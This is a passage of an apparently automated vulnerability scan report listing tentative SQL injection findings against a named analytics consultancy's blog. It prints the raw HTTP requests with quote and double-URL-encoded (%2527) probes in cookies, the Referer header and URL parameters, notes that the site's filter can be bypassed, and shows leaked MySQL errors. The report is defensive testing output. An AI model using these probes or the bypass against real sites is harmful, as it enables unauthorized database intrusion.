Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog.html
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb%2527; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 1

HTTP/1.1 200 OK
Date: Fri, 05 Nov 2010 23:38:42 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/googleanalytics/114-share-advanced-segment-google-analytics.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog.html
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb%2527%2527; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 2

HTTP/1.1 200 OK
Date: Fri, 05 Nov 2010 23:38:43 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Connection: close
Content-Type: text/html
Content-Length: 326

<br />
<b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro
...[SNIP]...

1.93. http://www.analyticspros.com/blog/googleanalytics/114-share-advanced-segment-google-analytics.html [ki_t cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/googleanalytics/114-share-advanced-segment-google-analytics.html

Issue detail

The ki_t cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the ki_t cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /blog/googleanalytics/114-share-advanced-segment-google-analytics.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog.html
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11'; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 05:43:41 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/googleanalytics/114-share-advanced-segment-google-analytics.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog.html
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11''; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 05:43:42 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Connection: close
Content-Type: text/html
Content-Length: 326

<br />
<b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro
...[SNIP]...

1.94. http://www.analyticspros.com/blog/googleanalytics/114-share-advanced-segment-google-analytics.html [ki_t cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/googleanalytics/114-share-advanced-segment-google-analytics.html

Issue detail

The ki_t cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the ki_t cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the ki_t cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /blog/googleanalytics/114-share-advanced-segment-google-analytics.html?itemid=70#comment HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog/googleanalytics.html
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11%2527; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 05:45:35 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/googleanalytics/114-share-advanced-segment-google-analytics.html?itemid=70#comment HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog/googleanalytics.html
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11%2527%2527; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 05:45:36 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Connection: close
Content-Type: text/html
Content-Length: 326

<br />
<b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro
...[SNIP]...

1.95. http://www.analyticspros.com/blog/googleanalytics/114-share-advanced-segment-google-analytics.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/googleanalytics/114-share-advanced-segment-google-analytics.html

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /blog/googleanalytics/114-share-advanced-segment-google-analytics.html?itemid=70#comment&1%2527=1 HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog/googleanalytics.html
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 05:58:14 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/googleanalytics/114-share-advanced-segment-google-analytics.html?itemid=70#comment&1%2527%2527=1 HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog/googleanalytics.html
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 05:58:16 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 05:58:18 GMT; path=/
Last-Modified: Sat, 06 Nov 2010 05:58:18 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 21425


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...

1.96. http://www.analyticspros.com/blog/googleanalytics/115-analytics-toolbar-for-dma-known-issues.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/googleanalytics/115-analytics-toolbar-for-dma-known-issues.html

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /blog/googleanalytics/115-analytics-toolbar-for-dma-known-issues.html'?itemid=70#comment HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog/googleanalytics.html
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 1

HTTP/1.1 404 Not Found
Date: Sat, 06 Nov 2010 06:00:11 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/googleanalytics/115-analytics-toolbar-for-dma-known-issues.html''?itemid=70#comment HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog/googleanalytics.html
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 2

HTTP/1.1 404 Not Found
Date: Sat, 06 Nov 2010 06:00:18 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 06:00:19 GMT; path=/
Last-Modified: Sat, 06 Nov 2010 06:00:19 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22288


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...

1.97. http://www.analyticspros.com/blog/googleanalytics/115-analytics-toolbar-for-dma-known-issues.html [Referer HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/googleanalytics/115-analytics-toolbar-for-dma-known-issues.html

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the Referer HTTP header as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /blog/googleanalytics/115-analytics-toolbar-for-dma-known-issues.html?itemid=70#comment HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.google.com/search?hl=en&q=%2527
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 05:57:17 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/googleanalytics/115-analytics-toolbar-for-dma-known-issues.html?itemid=70#comment HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.google.com/search?hl=en&q=%2527%2527
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 05:57:18 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Connection: close
Content-Type: text/html
Content-Length: 326

<br />
<b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro
...[SNIP]...

1.98. http://www.analyticspros.com/blog/googleanalytics/115-analytics-toolbar-for-dma-known-issues.html [optimizelyEndUserId cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/googleanalytics/115-analytics-toolbar-for-dma-known-issues.html

Issue detail

The optimizelyEndUserId cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the optimizelyEndUserId cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /blog/googleanalytics/115-analytics-toolbar-for-dma-known-issues.html?itemid=70#comment HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog/googleanalytics.html
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169';

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 05:53:34 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/googleanalytics/115-analytics-toolbar-for-dma-known-issues.html?itemid=70#comment HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog/googleanalytics.html
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169'';

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 05:53:36 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 05:53:40 GMT; path=/
Last-Modified: Sat, 06 Nov 2010 05:53:40 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 22270


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...

1.99. http://www.analyticspros.com/blog/googleanalytics/60-ga-extended-segments-part-1.html [d4dad6935f632ac35975e3001dc7bbe8 cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/googleanalytics/60-ga-extended-segments-part-1.html

Issue detail

The d4dad6935f632ac35975e3001dc7bbe8 cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the d4dad6935f632ac35975e3001dc7bbe8 cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /blog/googleanalytics/60-ga-extended-segments-part-1.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog.html?start=15
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb'; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 1

HTTP/1.1 200 OK
Date: Fri, 05 Nov 2010 23:39:56 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/googleanalytics/60-ga-extended-segments-part-1.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog.html?start=15
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb''; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 2

HTTP/1.1 200 OK
Date: Fri, 05 Nov 2010 23:39:58 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: d4dad6935f632ac35975e3001dc7bbe8=103ed91c731dbf91fdf70a26e6f77494; path=/
Set-Cookie: apros2.0_tpl=apros2.0; expires=Wed, 26-Oct-2011 23:40:04 GMT; path=/
Last-Modified: Fri, 05 Nov 2010 23:40:04 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 28803


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

